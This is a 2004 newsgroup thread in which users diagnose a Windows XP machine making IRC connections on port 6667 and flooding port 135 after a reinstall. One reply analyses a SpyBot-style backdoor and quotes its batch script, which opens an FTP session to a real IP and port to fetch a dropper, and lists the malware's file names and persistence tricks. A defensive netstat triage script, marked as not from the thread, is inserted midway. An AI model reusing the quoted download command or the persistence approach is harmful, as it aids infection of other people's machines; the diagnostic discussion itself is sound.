Worm never seen before

I.L.B.

Hi all;

I am just experiencing a strange kind of infection. I don't know whether it is a
new worm or not, as I have never seen it before. The situation is as follows:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK.
- When I start an XP session and activate my network connection... I start to
see very heavy traffic on the LEDs of my ADSL hub/router. The activity light is
flickering like crazy... what is happening??
- I check the status of the connection, and I see dozens of outbound packets
per second, and almost nothing incoming. Strange...
- I run NETSTAT to see what is happening. I see a LOT of outbound TCP
connections in "SYN_SENT" state from a series of ports from 3400 to 3600 and so
on... no way to stop it! All of these netstat entries end at some strange IPs
on the EPMAP port.
- I run Task Manager, and I see a lot of started processes of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for the Sasser and Welchia worms, but the tools said I don't have
these worms on my computer...

Any ideas? Thanks!!
 
Ashok S.

I.L.B. said:
> Hi all;
>
> I am just experiencing a strange kind of infection. I don't know whether it is
> a new worm or not, as I have never seen it before. The situation is as follows:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK.
> - When I start an XP session and activate my network connection... I start to
> see very heavy traffic on the LEDs of my ADSL hub/router. The activity light is
> flickering like crazy... what is happening??
> - I check the status of the connection, and I see dozens of outbound packets
> per second, and almost nothing incoming. Strange...
> - I run NETSTAT to see what is happening. I see a LOT of outbound TCP
> connections in "SYN_SENT" state from a series of ports from 3400 to 3600 and so
> on... no way to stop it! All of these netstat entries end at some strange IPs
> on the EPMAP port.
> - I run Task Manager, and I see a lot of started processes of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for the Sasser and Welchia worms, but the tools said I don't
> have these worms on my computer...
>
> Any ideas? Thanks!!

Scan for spyware programs. Use adaware or spybot for it. Make sure your
antivirus is up to date. Scan for trojans as well; www.moosoft.com has a free
scanner. If your router has a built-in firewall, use it, or download one of
the many around. Zone Alarm has a free version.
Also see http://www.pacs-portal.co.uk/startup_content.php to see what
programs are running in Task Manager and what they are.
A good information site on firewalls:
http://computer.howstuffworks.com/firewall.htm
Ashok S.
 
bluddihun

I just tried the moosoft scanner and it seems to work OK, identifying a
small demonstration app I downloaded from Gibson's Shields Up.
I also really wondered about the ports I found open with netstat, but it
turns out epmap is the 'endpoint mapper', which is a legit process, as is
microsoft-ds (SMB).
svchost is the generic Windows services host process, and multiple instances
are normal.
As to the burst of data outbound, I don't know...
Good luck.
 
Stan Goodman

> Hi all;
>
> I am just experiencing a strange kind of infection. I don't know whether it is
> a new worm or not, as I have never seen it before. The situation is as follows:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK.
> - When I start an XP session and activate my network connection... I start to
> see very heavy traffic on the LEDs of my ADSL hub/router. The activity light is
> flickering like crazy... what is happening??
> - I check the status of the connection, and I see dozens of outbound packets
> per second, and almost nothing incoming. Strange...
> - I run NETSTAT to see what is happening. I see a LOT of outbound TCP
> connections in "SYN_SENT" state from a series of ports from 3400 to 3600 and so
> on... no way to stop it! All of these netstat entries end at some strange IPs
> on the EPMAP port.
> - I run Task Manager, and I see a lot of started processes of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for the Sasser and Welchia worms, but the tools said I don't
> have these worms on my computer...
>
> Any ideas? Thanks!!

Perhaps the system is calling home to tell Uncle Bill what you had for
breakfast, or what kind of pizza you ordered from Domino. A sparrow does not
fall from the sky but Uncle Bill wants to know all about it.

--
Stan Goodman
Qiryat Tiv'on
Israel

All those who believe that the best physicians in France, given two weeks,
can't diagnose what ails a patient - please stand up.
 
Lars M. Hansen

On 30 Dec 2004 12:04:31 GMT, Stan Goodman spoketh
> Perhaps the system is calling home to tell Uncle Bill what you had for
> breakfast, or what kind of pizza you ordered from Domino. A sparrow does not
> fall from the sky but Uncle Bill wants to know all about it.

Bullsh*t.

Lars M. Hansen
http://www.hansenonline.net
(replace 'badnews' with 'news' in e-mail address)
 
Beauregard T. Shagnasty

I.L.B. said:
> Hi all;
> I am just experiencing a strange kind of infection. I don't know whether it is
> a new worm or not, as I have never seen it before. The situation is as follows:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK.
> - When I start an XP session and activate my network connection... I start to
> see very heavy traffic on the LEDs of my ADSL hub/router. The activity light is
> flickering like crazy... what is happening??

Hub/router? Do you mean the DSL modem? It is neither a hub nor a
router. You should have a real router between the DSL modem and your
computer.

> - I check the status of the connection, and I see dozens of outbound packets
> per second, and almost nothing incoming. Strange...

Ah. I'd bet that your computer is compromised and has become a zombie
for spammers. You are likely relaying spam. (Nearly 3/4 of the spam I
receive comes from someone's broadband connection.)

If you had a software firewall that monitored outgoing traffic, you
could block it. If you had a firewall, you probably wouldn't be infected.

> - I run NETSTAT to see what is happening. I see a LOT of outbound TCP
> connections in "SYN_SENT" state from a series of ports from 3400 to 3600 and so
> on... no way to stop it! All of these netstat entries end at some strange IPs
> on the EPMAP port.

...probably the spammer's connection to you.

> - I run Task Manager, and I see a lot of started processes of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for the Sasser and Welchia worms, but the tools said I don't
> have these worms on my computer...

What tools did you use?

http://home.rochester.rr.com/bshagnasty/tips.html#spyware
 
I.L.B.

Thanks guys, but I just ran the scanners you told me about, with no results....

This is really strange: it keeps happening! It happened just after
re-installing Windows XP, when trying to update it to SP1 and SP2.... that's
when the outbound bursts began. I can turn off the network connection and
restart it again... then after a few seconds, the bursts of outgoing packets
start... when running NETSTAT, I see first an ESTABLISHED connection to
"unknown.sagonet.net:6667" (an IRC port!!!), then comes the stream of
outbound packets, from ports 3000 to 4000 and so on... with no end!! In the
meanwhile I have no access to web surfing nor anything regular, just bursts of
TCP packets flying away from my computer.

And it happened just when I re-installed XP, so I haven't had time to download
any virus or worm or anything.

If that sounds familiar to any of you, please help me. Thanks...
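As an added example (not code from the thread), here is a small Python triage script that parses Windows-style `netstat -an` output and flags the two patterns described in this post: an ESTABLISHED session to an IRC port and a burst of half-open SYN_SENT connections from consecutive local ports to EPMAP (135) or microsoft-ds (445). The sample netstat excerpt, its addresses and the threshold are constructed for the example.

```python
import re
from collections import defaultdict, namedtuple

# Constructed "netstat -an" excerpt (not from the thread; RFC 5737 addresses):
# one IRC session and a burst of half-open connections to EPMAP (port 135).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    192.168.1.5:1045       203.0.113.9:6667       ESTABLISHED
  TCP    192.168.1.5:1080       203.0.113.20:80        ESTABLISHED
  TCP    192.168.1.5:3400       198.51.100.1:135       SYN_SENT
  TCP    192.168.1.5:3401       198.51.100.2:135       SYN_SENT
  TCP    192.168.1.5:3402       198.51.100.3:135       SYN_SENT
  TCP    192.168.1.5:3403       198.51.100.4:135       SYN_SENT
  TCP    192.168.1.5:3404       198.51.100.5:135       SYN_SENT
  UDP    0.0.0.0:137            *:*
"""

Conn = namedtuple("Conn", "proto lport rhost rport state")
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+\S+:(\d+)\s+(\S+):(\d+|\*)\s*(\S*)\s*$")

IRC_PORTS = {6667}        # C&C channel port named in the thread
SCAN_PORTS = {135, 445}   # EPMAP and microsoft-ds, the 2004 worm targets
SYN_THRESHOLD = 4         # distinct hosts in SYN_SENT before calling it a scan

def parse_netstat(text):
    """Parse Windows-style netstat -an lines into Conn tuples; skip headers."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            proto, lport, rhost, rport, state = m.groups()
            conns.append(Conn(proto, int(lport), rhost,
                              None if rport == "*" else int(rport), state))
    return conns

def triage(conns):
    """Flag established IRC sessions and outbound SYN_SENT bursts per port."""
    irc = [(c.rhost, c.rport) for c in conns
           if c.state == "ESTABLISHED" and c.rport in IRC_PORTS]
    hosts, lports = defaultdict(set), defaultdict(list)   # keyed by rport
    for c in conns:
        if c.state == "SYN_SENT" and c.rport in SCAN_PORTS:
            hosts[c.rport].add(c.rhost)
            lports[c.rport].append(c.lport)
    scans = {p: {"hosts": len(h), "local_ports": (min(lports[p]), max(lports[p]))}
             for p, h in hosts.items() if len(h) >= SYN_THRESHOLD}
    return {"irc": irc, "scans": scans}
```

On a live machine the same functions can be fed the captured text of `netstat -an`; a non-empty `scans` entry for port 135 alongside an `irc` hit is the bot-plus-propagation signature the thread converges on.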
 
Gerard Bok

> I just tried the moosoft scanner and it seems to work OK, identifying a
> small demonstration app I downloaded from Gibson's Shields Up.
> I also really wondered about the ports I found open with netstat, but it
> turns out epmap is the 'endpoint mapper', which is a legit process, as is
> microsoft-ds (SMB).
> svchost is the generic Windows services host process, and multiple instances
> are normal.

True.
But that does not mean that one (or more) of the svchost
instances are caused by a worm or other malware :)

(Why write the entire virus when you have Windows available :)
 
John Coutts

It sounds like one of the many variants of the SpyBot backdoor trojan.
Typically, what these worms do is set up a connection to an IRC chat channel on
port 6667 to listen for further instructions. They can be very sophisticated in
that they will hide themselves and re-establish themselves when removed. For
example, I found one called <bling.exe>. This program was used to install
<mswin.exe> and <msdll.gif>. <mswin.exe> was an IRC proxy program, and
<msdll.gif> was the configuration file used to load it. Another program was
loaded called <hidden32.exe>, and this was used to load the IRC program and
hide it from the task list. It also loaded its own <kernel32.exe>, of which
there may be multiple copies running. <mswin.exe> was instructed which one to
use from the file <mybot.pid>, which stored the Process ID. The IRC proxy
program sat idle for 10 days, and then one day when I logged in under an
administrator account, it activated an open FTP server program called U-SERV.

All this was accomplished using a Microsoft vulnerability on port 445. It
was able to activate a TFTP session and run a batch file simply called "o",
which was then used to download the bling.exe file:

open 142.149.31.32 22187
user 1 1
get bling.exe
quit

Removing bling.exe will not remove the established IRC proxy. As a matter of
fact, every time the proxy program was removed it would reactivate through a
series of batch files. I had to boot up in safe mode, remove the registry
entries, and then physically remove the backdoor programs from the %system%
directory. Only then could I safely boot up in normal mode without reactivating
the proxy program.

J.A. Coutts
*************** REPLY SEPARATOR ****************
 
Stan Goodman

> On 30 Dec 2004 12:04:31 GMT, Stan Goodman spoketh
>
>
> Bullsh*t.

There's no "I" on your keyboard?

=;-/8

--
Stan Goodman
Qiryat Tiv'on
Israel

All those who believe that the best physicians in France, given two weeks,
can't diagnose what ails a patient - please stand up.
 
I.L.B.

Finally... I had to download a standalone Service Pack 2 for XP... that
includes improved security, firewalls, etc., and now my XP is back to normal
life again.

So the XP I got is risky! It begins to do strange things just after being
installed and it needs to be "servicepacked" ASAP!!!

Jesus!
 
Jason Edwards

Bart Bailey said:

It depends on what is meant by a real router.
A NAT router will ignore incoming connection requests and will not forward
them to your PC unless it is set up to do port forwarding.
Some DSL modems (which use telephone lines) have built-in NAT routers, but
I've yet to come across a cable modem (which uses a TV cable) that does.

Why is a NAT router a good idea?
Because when you're setting up a freshly installed Windows 2000 or Windows
XP PC, it will take about 30 seconds to get a worm infection if you don't
have a separate box between you and the Internet which blocks incoming
connection requests.
There are two ways around this when doing a reinstall, but almost no-one uses
them because 1 is too easy to forget and 2 is too difficult.
1. Turn on the built-in firewall in XP BEFORE you connect to the
Internet/modem.
2. Make yourself a CD with the most recent service pack slipstreamed in.

In the time it took to write this I have logged five incoming TCP port 135
connection requests.

http://www.google.com/search?&q=tcp+port+135+blaster

Jason
 
Beauregard T. Shagnasty

Please don't start new threads when you really wanted to reply to your
other message.

> Finally... I had to download a standalone Service Pack 2 for XP...
> that includes improved security, firewalls, etc., and now my XP is
> back to normal life again.

We will see...

> So the XP I got is risky! It begins to do strange things just after
> being installed and it needs to be "servicepacked" ASAP!!!

No it doesn't, but it does need to be firewalled before ever
connecting to the internet.

Yes. Does your XP SP2 *really* have:
X-Newsreader: Microsoft Outlook Express 5.00.2919.6600

or are you posting from some other ancient machine?
 
Bart Bailey

> Some DSL modems (which use telephone lines) have built-in NAT routers, but
> I've yet to come across a cable modem (which uses a TV cable) that does.

Efficient Networks SpeedStream 5100 here via POTS,
but I don't know if it qualifies as a contained NAT or not.

I've heard much talk of the necessity of a stand-alone router, laced
with exaggerated comments about the insecurity of an onboard software
firewall, yet I've never been able to find anyone that could
successfully demonstrate this insecurity. In fact one blowhard once
claimed to be able to "own" any 9x system on the net, but was
predictably unable to back up his spew.

If there exists some sploit for my setup,
I'd sure like to know about it.
...and no, not something I have to authorize, like a tooleaky tool,
but a real "stranger on the net" attack.

System here:
OS: Win98SE
FW: EZ Firewall v4.5.585
Current IP#: 68.124.218.29

good luck
 
Robert

Good idea. If I (ever?) get one, it will be behind a broadband router
with NAT (already there), and I'll never browse with IE, or mail with
OE. Remember how it was announced: "The safest Windows ever". Now it is
the most often(ly?) attacked and corrupted one.

Two things that do not go together: Microsoft and Security.


--

Regards
Robert

Smile... it increases your face value!
 
Jason Edwards

Bart Bailey said:
> Efficient Networks SpeedStream 5100 here via POTS,
> but I don't know if it qualifies as a contained NAT or not.

A quick Google suggests it doesn't, but I have not read the manual in detail,
so it is possible I missed one or more of its capabilities.

> I've heard much talk of the necessity of a stand-alone router, laced
> with exaggerated comments about the insecurity of an onboard software
> firewall, yet I've never been able to find anyone that could
> successfully demonstrate this insecurity.

Try setting up unpatched RTM Windows 2000 or Windows XP and see what
happens.
When I last tried it for demonstration reasons it took less than 1 minute
for a worm to spread to the demonstration PC. The PC was then disconnected
and reformatted.

> In fact one blowhard once
> claimed to be able to "own" any 9x system on the net, but was
> predictably unable to back up his spew.

Yeah well, I can understand that it is sometimes difficult to distinguish
between spew and facts.

> If there exists some sploit for my setup,
> I'd sure like to know about it.

If you are fully patched (have all critical or high priority Windows
updates) then if I were you I would not worry.

> ...and no, not something I have to authorize, like a tooleaky tool,
> but a real "stranger on the net" attack.

Attacks by real people are rare as far as the average home user is
concerned. Most 'attacks' come from other compromised Windows PCs. There are
exceptions, such as if you're running unpatched IIS, but you're not doing
that, are you?

Jason
 
Duane Arnold

Bart Bailey said:
> Efficient Networks SpeedStream 5100 here via POTS,
> but I don't know if it qualifies as a contained NAT or not.
>
> I've heard much talk of the necessity of a stand-alone router, laced
> with exaggerated comments about the insecurity of an onboard software
> firewall, yet I've never been able to find anyone that could
> successfully demonstrate this insecurity. In fact one blowhard once
> claimed to be able to "own" any 9x system on the net, but was
> predictably unable to back up his spew.

There go your delusions again. You must have been smoking the pot when we
had our little conversation and read into it what you wanted. You stupid
*clown* prove it to yourself one way or the other and stop whining.

You are an absolute jackass Bart. I should have never snatched your
worthless *heart* from you that day as you have been a fool from that
point.

I am in your face about it.

Duane :)
 
